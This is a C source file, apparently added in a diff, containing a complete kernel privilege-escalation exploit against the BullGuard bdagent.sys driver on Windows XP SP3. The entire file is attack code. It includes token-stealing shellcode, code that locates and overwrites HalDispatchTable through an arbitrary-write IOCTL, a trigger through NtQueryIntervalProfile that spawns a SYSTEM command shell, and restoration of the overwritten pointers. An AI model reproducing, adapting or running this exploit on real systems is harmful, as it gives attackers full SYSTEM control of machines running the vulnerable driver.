+#include +#include + +#define BUFSIZE 4096 + + +typedef struct _SYSTEM_MODULE_INFORMATION_ENTRY { + PVOID Unknown1; + PVOID Unknown2; + PVOID Base; + ULONG Size; + ULONG Flags; + USHORT Index; + USHORT NameLength; + USHORT LoadCount; + USHORT PathLength; + CHAR ImageName[256]; +} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY; + +typedef struct _SYSTEM_MODULE_INFORMATION { + ULONG Count; + SYSTEM_MODULE_INFORMATION_ENTRY Module[1]; +} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION; + +typedef enum _SYSTEM_INFORMATION_CLASS { + SystemModuleInformation = 11, + SystemHandleInformation = 16 +} SYSTEM_INFORMATION_CLASS; + +typedef NTSTATUS (WINAPI *_NtQuerySystemInformation)( + SYSTEM_INFORMATION_CLASS SystemInformationClass, + PVOID SystemInformation, + ULONG SystemInformationLength, + PULONG ReturnLength); + +typedef NTSTATUS (WINAPI *_NtQueryIntervalProfile)( + DWORD ProfileSource, + PULONG Interval); + +typedef void (*FUNCTPTR)(); + + + +// Windows XP SP3 + +#define XP_KPROCESS 0x44 // Offset to _KPROCESS from a _ETHREAD struct +#define XP_TOKEN 0xc8 // Offset to TOKEN from the _EPROCESS struct +#define XP_UPID 0x84 // Offset to UniqueProcessId FROM the _EPROCESS struct +#define XP_APLINKS 0x88 // Offset to ActiveProcessLinks _EPROCESS struct + + +BYTE token_steal_xp[] = +{ + 0x52, // push edx Save edx on the stack + 0x53, // push ebx Save ebx on the stack + 0x33,0xc0, // xor eax, eax eax = 0 + 0x64,0x8b,0x80,0x24,0x01,0x00,0x00, // mov eax, fs:[eax+124h] Retrieve ETHREAD + 0x8b,0x40,XP_KPROCESS, // mov eax, [eax+XP_KPROCESS] Retrieve _KPROCESS + 0x8b,0xc8, // mov ecx, eax + 0x8b,0x98,XP_TOKEN,0x00,0x00,0x00, // mov ebx, [eax+XP_TOKEN] Retrieves TOKEN + 0x8b,0x80,XP_APLINKS,0x00,0x00,0x00, // mov eax, [eax+XP_APLINKS] <-| Retrieve FLINK from ActiveProcessLinks + 0x81,0xe8,XP_APLINKS,0x00,0x00,0x00, // sub eax, XP_APLINKS | Retrieve _EPROCESS Pointer from the ActiveProcessLinks + 0x81,0xb8,XP_UPID,0x00,0x00,0x00,0x04,0x00,0x00,0x00, // cmp [eax+XP_UPID], 4 | Compares UniqueProcessId with 4 (System Process) + 0x75,0xe8, // jne ---- + 0x8b,0x90,XP_TOKEN,0x00,0x00,0x00, // mov edx, [eax+XP_TOKEN] Retrieves TOKEN and stores on EDX + 0x8b,0xc1, // mov eax, ecx Retrieves KPROCESS stored on ECX + 0x89,0x90,XP_TOKEN,0x00,0x00,0x00, // mov [eax+XP_TOKEN], edx Overwrites the TOKEN for the current KPROCESS + 0x5b, // pop ebx Restores ebx + 0x5a, // pop edx Restores edx + 0xc2,0x08 // ret 8 Away from the kernel +}; + + + +BYTE restore_pointers_xp[] = // kd> dps nt!HalDispatchTable +"\xf2\xa3\x6f\x80" // 8054ccbc 806fa3f2 hal!HaliQuerySystemInformation +"\xce\xa3\x6f\x80" // 8054ccc0 806fa3ce hal!HaliSetSystemInformation +"\x0b\x46\x61\x80" // 8054ccc4 8061460b nt!xHalQueryBusSlots +"\x00\x00\x00\x00" // 8054ccc8 00000000 +"\x4d\xac\x50\x80" // 8054cccc 8050ac4d nt!HalExamineMBR +"\x89\x6f\x5c\x80" // 8054ccd0 805c6f89 nt!IoAssignDriveLetters +"\xe5\x4a\x5c\x80"; // 8054ccd4 805c4ae5 nt!IoReadPartitionTable + + + +DWORD HalDispatchTableAddress() +{ + _NtQuerySystemInformation NtQuerySystemInformation; + PSYSTEM_MODULE_INFORMATION pModuleInfo; + DWORD HalDispatchTable; + CHAR kFullName[256]; + PVOID kBase = NULL; + LPSTR kName; + HMODULE Kernel; + FUNCTPTR Hal; + ULONG len; + NTSTATUS status; + + + NtQuerySystemInformation = (_NtQuerySystemInformation)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQuerySystemInformation"); + + if (!NtQuerySystemInformation) + { + printf("[-] Unable to resolve NtQuerySystemInformation\n\n"); + return -1; + } + + status = NtQuerySystemInformation(SystemModuleInformation, NULL, 0, &len); + + if (!status) + { + printf("[-] An error occured while reading NtQuerySystemInformation. Status = 0x%08x\n\n", status); + return -1; + } + + pModuleInfo = (PSYSTEM_MODULE_INFORMATION)GlobalAlloc(GMEM_ZEROINIT, len); + + if(pModuleInfo == NULL) + { + printf("[-] An error occurred with GlobalAlloc for pModuleInfo\n\n"); + return -1; + } + + status = NtQuerySystemInformation(SystemModuleInformation, pModuleInfo, len, &len); + + memset(kFullName, 0x00, sizeof(kFullName)); + strcpy_s(kFullName, sizeof(kFullName)-1, pModuleInfo->Module[0].ImageName); + kBase = pModuleInfo->Module[0].Base; + + printf("[i] Kernel base name %s\n", kFullName); + kName = strrchr(kFullName, '\\'); + + Kernel = LoadLibraryA(++kName); + + if(Kernel == NULL) + { + printf("[-] Failed to load kernel base\n\n"); + return -1; + } + + Hal = (FUNCTPTR)GetProcAddress(Kernel, "HalDispatchTable"); + + if(Hal == NULL) + { + printf("[-] Failed to find HalDispatchTable\n\n"); + return -1; + } + + printf("[i] HalDispatchTable address 0x%08x\n", Hal); + printf("[i] Kernel handle 0x%08x\n", Kernel); + printf("[i] Kernel base address 0x%08x\n", kBase); + + HalDispatchTable = ((DWORD)Hal - (DWORD)Kernel + (DWORD)kBase); + + printf("[+] Kernel address of HalDispatchTable 0x%08x\n", HalDispatchTable); + + if(!HalDispatchTable) + { + printf("[-] Failed to calculate HalDispatchTable\n\n"); + return -1; + } + + return HalDispatchTable; +} + + +int GetWindowsVersion() +{ + int v = 0; + DWORD version = 0, minVersion = 0, majVersion = 0; + + version = GetVersion(); + + minVersion = (DWORD)(HIBYTE(LOWORD(version))); + majVersion = (DWORD)(LOBYTE(LOWORD(version))); + + if (minVersion == 1 && majVersion == 5) v = 1; // "Windows XP; + if (minVersion == 1 && majVersion == 6) v = 2; // "Windows 7"; + if (minVersion == 2 && majVersion == 5) v = 3; // "Windows Server 2003; + + return v; +} + + +void spawnShell() +{ + STARTUPINFOA si; + PROCESS_INFORMATION pi; + + + ZeroMemory(&pi, sizeof(pi)); + ZeroMemory(&si, sizeof(si)); + si.cb = sizeof(si); + + si.cb = sizeof(si); + si.dwFlags = STARTF_USESHOWWINDOW; + si.wShowWindow = SW_SHOWNORMAL; + + if (!CreateProcess(NULL, "cmd.exe", NULL, NULL, TRUE, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi)) + { + printf("\n[-] CreateProcess failed (%d)\n\n", GetLastError()); + return; + } + + CloseHandle(pi.hThread); + CloseHandle(pi.hProcess); +} + + +int main(int argc, char *argv[]) +{ + + _NtQueryIntervalProfile NtQueryIntervalProfile; + LPVOID input[1] = {0}; + LPVOID addrtoshell; + HANDLE hDevice; + DWORD dwRetBytes = 0; + DWORD HalDispatchTableTarget; + ULONG time = 0; + unsigned char devhandle[MAX_PATH]; + + + printf("-------------------------------------------------------------------------------\n"); + printf(" BullGuard Multiple Products (bdagent.sys) Arbitrary Write EoP Exploit \n"); + printf(" Tested on Windows XP SP3 (32bit) \n"); + printf("-------------------------------------------------------------------------------\n\n"); + + if (GetWindowsVersion() == 1) + { + printf("[i] Running Windows XP\n"); + } + + if (GetWindowsVersion() == 0) + { + printf("[i] Exploit not supported on this OS\n\n"); + return -1; + } + + sprintf(devhandle, "\\\\.\\%s", "bdagent"); + + NtQueryIntervalProfile = (_NtQueryIntervalProfile)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQueryIntervalProfile"); + + if (!NtQueryIntervalProfile) + { + printf("[-] Unable to resolve NtQueryIntervalProfile\n\n"); + return -1; + } + + addrtoshell = VirtualAlloc(NULL, BUFSIZE, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); + + if(addrtoshell == NULL) + { + printf("[-] VirtualAlloc allocation failure %.8x\n\n", GetLastError()); + return -1; + } + printf("[+] VirtualAlloc allocated memory at 0x%.8x\n", addrtoshell); + + memset(addrtoshell, 0x90, BUFSIZE); + memcpy(addrtoshell, token_steal_xp, sizeof(token_steal_xp)); + printf("[i] Size of shellcode %d bytes\n", sizeof(token_steal_xp)); + + hDevice = CreateFile(devhandle, GENERIC_READ, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING , 0, NULL); + + if (hDevice == INVALID_HANDLE_VALUE) + { + printf("[-] CreateFile open %s device failed (%d)\n\n", devhandle, GetLastError()); + return -1; + } + else + { + printf("[+] Open %s device successful\n", devhandle); + } + + HalDispatchTableTarget = HalDispatchTableAddress() + sizeof(DWORD); + printf("[+] HalDispatchTable+4 (0x%08x) will be overwritten\n", HalDispatchTableTarget); + + input[0] = addrtoshell; // input buffer contents gets written to our output buffer address + + printf("[+] Input buffer contents %08x\n", input[0]); + + printf("[~] Press any key to send Exploit . . .\n"); + getch(); + + DeviceIoControl(hDevice, 0x0022405c, input, sizeof(input), (LPVOID)HalDispatchTableTarget, 0, &dwRetBytes, NULL); + + printf("[+] Buffer sent\n"); + + printf("[+] Spawning SYSTEM Shell\n"); + NtQueryIntervalProfile(2, &time); + spawnShell(); + + printf("[+] Restoring Hal dispatch table pointers\n\n"); + + DeviceIoControl(hDevice, 0x0022405c, restore_pointers_xp, sizeof(restore_pointers_xp)-1, (LPVOID)HalDispatchTableTarget, 0, &dwRetBytes, NULL); + + CloseHandle(hDevice); + + return 0; +}